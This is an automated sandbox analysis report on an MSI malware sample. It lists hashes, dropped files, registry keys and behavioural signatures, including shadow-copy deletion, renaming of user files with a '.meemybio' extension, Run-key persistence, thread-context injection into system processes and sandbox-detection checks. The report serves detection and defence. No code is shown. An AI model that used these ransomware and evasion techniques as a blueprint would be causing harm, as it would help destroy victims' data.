Analysis
max time kernel: 1750s
max time network: 1800s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 23-05-2022 06:50

Static task: static1

Behavioral task: behavioral1
Sample: 9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be.msi
Resource: win7-20220414-en

Behavioral task: behavioral2
Sample: 9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be.msi
Resource: win10v2004-20220414-en

General
Target: 9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be.msi
Size: 96KB
MD5: 957d0c81c985609c580565a0323a14cd
SHA1: d8d46413409a14a1ae407107016e28074c6824d5
SHA256: 9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be
SHA512: 0ff024ff07ab13e7d308429fd8906560e58610b63a7dd468f6b5b6c86221962dbc27e93090e5607104201e9cabe90b52affba54411a541f5c2f5369db231cf52
Malware Config
Signatures
- Registers COM server for autorun (1 TTPs)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Downloads MZ/PE file
- Executes dropped EXE (26 IoCs)
  Processes:
  pid | process
  6032 | msedgerecovery.exe
  6004 | MicrosoftEdgeUpdateSetup.exe
  6000 | MicrosoftEdgeUpdate.exe
  6088 | MicrosoftEdgeUpdate.exe
  1372 | MicrosoftEdgeUpdate.exe
  3604 | MicrosoftEdgeUpdateComRegisterShell64.exe
  4960 | MicrosoftEdgeUpdateComRegisterShell64.exe
  2692 | MicrosoftEdgeUpdateComRegisterShell64.exe
  864 | MicrosoftEdgeUpdate.exe
  5256 | MicrosoftEdgeUpdate.exe
  1852 | MicrosoftEdgeUpdate.exe
  2044 | MicrosoftEdgeUpdate.exe
  5080 | MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe
  4720 | MicrosoftEdgeUpdate.exe
  464 | MicrosoftEdgeUpdate.exe
  5064 | MicrosoftEdgeUpdate.exe
  1920 | MicrosoftEdgeUpdate.exe
  2616 | MicrosoftEdgeUpdateComRegisterShell64.exe
  2132 | MicrosoftEdgeUpdateComRegisterShell64.exe
  228 | MicrosoftEdgeUpdateComRegisterShell64.exe
  2908 | MicrosoftEdgeUpdate.exe
  3108 | MicrosoftEdgeUpdate.exe
  3172 | MicrosoftEdgeUpdate.exe
  5776 | MicrosoftEdge_X64_101.0.1210.53.exe
  5808 | setup.exe
  5960 | MicrosoftEdgeUpdate.exe
- Modifies Installed Components in the registry (2 TTPs)
- Modifies extensions of user files (9 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes:
  description | ioc | process
  File renamed | C:\Users\Admin\Pictures\DenyClear.crw => C:\Users\Admin\Pictures\DenyClear.crw.meemybio | MsiExec.exe
  File renamed | C:\Users\Admin\Pictures\GroupCopy.crw => C:\Users\Admin\Pictures\GroupCopy.crw.meemybio | MsiExec.exe
  File renamed | C:\Users\Admin\Pictures\UnprotectUnlock.crw => C:\Users\Admin\Pictures\UnprotectUnlock.crw.meemybio | MsiExec.exe
  File renamed | C:\Users\Admin\Pictures\MountInvoke.png => C:\Users\Admin\Pictures\MountInvoke.png.meemybio | MsiExec.exe
  File renamed | C:\Users\Admin\Pictures\SearchRevoke.png => C:\Users\Admin\Pictures\SearchRevoke.png.meemybio | MsiExec.exe
  File renamed | C:\Users\Admin\Pictures\ShowCopy.tif => C:\Users\Admin\Pictures\ShowCopy.tif.meemybio | MsiExec.exe
  File renamed | C:\Users\Admin\Pictures\ConvertEnable.crw => C:\Users\Admin\Pictures\ConvertEnable.crw.meemybio | MsiExec.exe
  File renamed | C:\Users\Admin\Pictures\CopyClear.png => C:\Users\Admin\Pictures\CopyClear.png.meemybio | MsiExec.exe
  File renamed | C:\Users\Admin\Pictures\InitializeCompress.png => C:\Users\Admin\Pictures\InitializeCompress.png.meemybio | MsiExec.exe
- Sets file execution options in registry (2 TTPs)
- Loads dropped DLL (32 IoCs)
  Processes:
  pid | process
  2364 | MsiExec.exe
  6000 | MicrosoftEdgeUpdate.exe
  6088 | MicrosoftEdgeUpdate.exe
  1372 | MicrosoftEdgeUpdate.exe
  3604 | MicrosoftEdgeUpdateComRegisterShell64.exe
  1372 | MicrosoftEdgeUpdate.exe
  4960 | MicrosoftEdgeUpdateComRegisterShell64.exe
  1372 | MicrosoftEdgeUpdate.exe
  2692 | MicrosoftEdgeUpdateComRegisterShell64.exe
  1372 | MicrosoftEdgeUpdate.exe
  864 | MicrosoftEdgeUpdate.exe
  5256 | MicrosoftEdgeUpdate.exe
  1852 | MicrosoftEdgeUpdate.exe
  1852 | MicrosoftEdgeUpdate.exe
  5256 | MicrosoftEdgeUpdate.exe
  2044 | MicrosoftEdgeUpdate.exe
  4720 | MicrosoftEdgeUpdate.exe
  464 | MicrosoftEdgeUpdate.exe
  5064 | MicrosoftEdgeUpdate.exe
  1920 | MicrosoftEdgeUpdate.exe
  2616 | MicrosoftEdgeUpdateComRegisterShell64.exe
  1920 | MicrosoftEdgeUpdate.exe
  2132 | MicrosoftEdgeUpdateComRegisterShell64.exe
  1920 | MicrosoftEdgeUpdate.exe
  228 | MicrosoftEdgeUpdateComRegisterShell64.exe
  1920 | MicrosoftEdgeUpdate.exe
  2908 | MicrosoftEdgeUpdate.exe
  3108 | MicrosoftEdgeUpdate.exe
  3172 | MicrosoftEdgeUpdate.exe
  3172 | MicrosoftEdgeUpdate.exe
  3108 | MicrosoftEdgeUpdate.exe
  5960 | MicrosoftEdgeUpdate.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | setup.exe
- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Enumerates connected drives (3 TTPs, 48 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes:
  description | ioc | process
  File opened (read-only) | \??\K: | msiexec.exe
  File opened (read-only) | \??\Q: | msiexec.exe
  File opened (read-only) | \??\A: | msiexec.exe
  File opened (read-only) | \??\X: | msiexec.exe
  File opened (read-only) | \??\B: | msiexec.exe
  File opened (read-only) | \??\Y: | msiexec.exe
  File opened (read-only) | \??\J: | msiexec.exe
  File opened (read-only) | \??\V: | msiexec.exe
  File opened (read-only) | \??\W: | msiexec.exe
  File opened (read-only) | \??\J: | msiexec.exe
  File opened (read-only) | \??\L: | msiexec.exe
  File opened (read-only) | \??\U: | msiexec.exe
  File opened (read-only) | \??\W: | msiexec.exe
  File opened (read-only) | \??\Z: | msiexec.exe
  File opened (read-only) | \??\K: | msiexec.exe
  File opened (read-only) | \??\L: | msiexec.exe
  File opened (read-only) | \??\E: | msiexec.exe
  File opened (read-only) | \??\A: | msiexec.exe
  File opened (read-only) | \??\I: | msiexec.exe
  File opened (read-only) | \??\P: | msiexec.exe
  File opened (read-only) | \??\B: | msiexec.exe
  File opened (read-only) | \??\G: | msiexec.exe
  File opened (read-only) | \??\Y: | msiexec.exe
  File opened (read-only) | \??\F: | msiexec.exe
  File opened (read-only) | \??\H: | msiexec.exe
  File opened (read-only) | \??\N: | msiexec.exe
  File opened (read-only) | \??\H: | msiexec.exe
  File opened (read-only) | \??\O: | msiexec.exe
  File opened (read-only) | \??\U: | msiexec.exe
  File opened (read-only) | \??\Q: | msiexec.exe
  File opened (read-only) | \??\S: | msiexec.exe
  File opened (read-only) | \??\R: | msiexec.exe
  File opened (read-only) | \??\I: | msiexec.exe
  File opened (read-only) | \??\M: | msiexec.exe
  File opened (read-only) | \??\N: | msiexec.exe
  File opened (read-only) | \??\X: | msiexec.exe
  File opened (read-only) | \??\F: | msiexec.exe
  File opened (read-only) | \??\T: | msiexec.exe
  File opened (read-only) | \??\G: | msiexec.exe
  File opened (read-only) | \??\Z: | msiexec.exe
  File opened (read-only) | \??\M: | msiexec.exe
  File opened (read-only) | \??\O: | msiexec.exe
  File opened (read-only) | \??\S: | msiexec.exe
  File opened (read-only) | \??\T: | msiexec.exe
  File opened (read-only) | \??\E: | msiexec.exe
  File opened (read-only) | \??\P: | msiexec.exe
  File opened (read-only) | \??\R: | msiexec.exe
  File opened (read-only) | \??\V: | msiexec.exe
- Installs/modifies Browser Helper Object (2 TTPs)
  BHOs are DLL modules which act as plugins for Internet Explorer.
- Drops file in System32 directory (1 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk | setup.exe
- Suspicious use of SetThreadContext (3 IoCs)
  Processes:
  description | pid | process | target process
  PID 2364 set thread context of 2776 | 2364 | MsiExec.exe | sihost.exe
  PID 2364 set thread context of 2800 | 2364 | MsiExec.exe | svchost.exe
  PID 2364 set thread context of 2872 | 2364 | MsiExec.exe | taskhostw.exe
- Drops file in Program Files directory (64 IoCs)
  Processes:
  description | ioc | process
  File created | C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\msedgeupdateres_kk.dll | MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\sr.pak | setup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\msedge.exe.sig | setup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\VisualElements\SmallLogo.png | setup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\VisualElements\SmallLogoCanary.png | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\msedge_proxy.exe | setup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_kn.dll | MicrosoftEdgeUpdateSetup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\msedgeupdateres_da.dll | MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\VisualElements\LogoDev.png | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Trust Protection Lists\Mu\Social | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\vi.pak | setup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | MicrosoftEdgeUpdate.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\fa.pak | setup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\hr.pak | setup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\pwahelper.dll | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\v8_context_snapshot.bin | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\km.pak | setup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_fr.dll | MicrosoftEdgeUpdateSetup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_hi.dll | MicrosoftEdgeUpdateSetup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\sv.pak | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\nacl_irt_x86_64.nexe | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\lt.pak | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\VisualElements\SmallLogoBeta.png | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\identity_proxy\resources.pri | setup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\msedgeupdateres_te.dll | MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\ml.pak | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\libGLESv2.dll | setup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_uk.dll | MicrosoftEdgeUpdateSetup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\psuser_arm64.dll | MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Trust Protection Lists\Mu\Fingerprinting | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\az.pak | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\de.pak | setup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\MicrosoftEdgeComRegisterShellARM64.exe | MicrosoftEdgeUpdateSetup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Trust Protection Lists\Mu\Content | setup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\lt.pak | setup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\notification_helper.exe | setup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\vccorlib140.dll | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\vcruntime140.dll | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Trust Protection Lists\Sigma\Entities | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\MLModels\autofill_labeling_features.txt | setup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_id.dll | MicrosoftEdgeUpdateSetup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\msedgeupdateres_ur.dll | MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\101.0.1210.53.manifest | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\bs.pak | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\gd.pak | setup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\msedgeupdateres_as.dll | MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\de.pak | setup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_lo.dll | MicrosoftEdgeUpdateSetup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\et.pak | setup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\VisualElements\SmallLogoDev.png | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\kok.pak | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\ug.pak | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\edge_feedback\mf_trace.wprp | setup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_am.dll | MicrosoftEdgeUpdateSetup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_bn.dll | MicrosoftEdgeUpdateSetup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{613F5B52-8BA7-4DF8-913D-DB0653388D7D}\EDGEMITMP_4E0CA.tmp\SETUP.EX_ | MicrosoftEdge_X64_101.0.1210.53.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\lo.pak | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\zh-CN.pak | setup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\psuser_64.dll | MicrosoftEdgeUpdateSetup.exe
  File created | C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_en.dll | MicrosoftEdgeUpdateSetup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\elevation_service.exe | setup.exe
  File created | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\libsmartscreen.dll | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\msedgewebview2.exe.sig | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\ca.pak | setup.exe
- Drops file in Windows directory (9 IoCs)
  Processes:
  description | ioc | process
  File created | C:\Windows\Installer\SourceHash{ACB5AE58-BF5F-4C81-8759-EF28BCB9E5CA} | msiexec.exe
  File created | C:\Windows\Installer\e56c652.msi | msiexec.exe
  File opened for modification | C:\Windows\Installer\e56c652.msi | msiexec.exe
  File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
  File opened for modification | C:\Windows\Installer\ | msiexec.exe
  File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
  File opened for modification | C:\Windows\Installer\MSIC76B.tmp | msiexec.exe
  File opened for modification | C:\Windows\Installer\MSICBF1.tmp | msiexec.exe
  File created | C:\Windows\Installer\e56c654.msi | msiexec.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks SCSI registry key(s) (3 TTPs, 64 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | svchost.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | vssvc.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | vssvc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | svchost.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | svchost.exe
  Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 | vssvc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | svchost.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | svchost.exe
  Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | vssvc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | svchost.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | svchost.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | svchost.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | vssvc.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities | svchost.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | svchost.exe
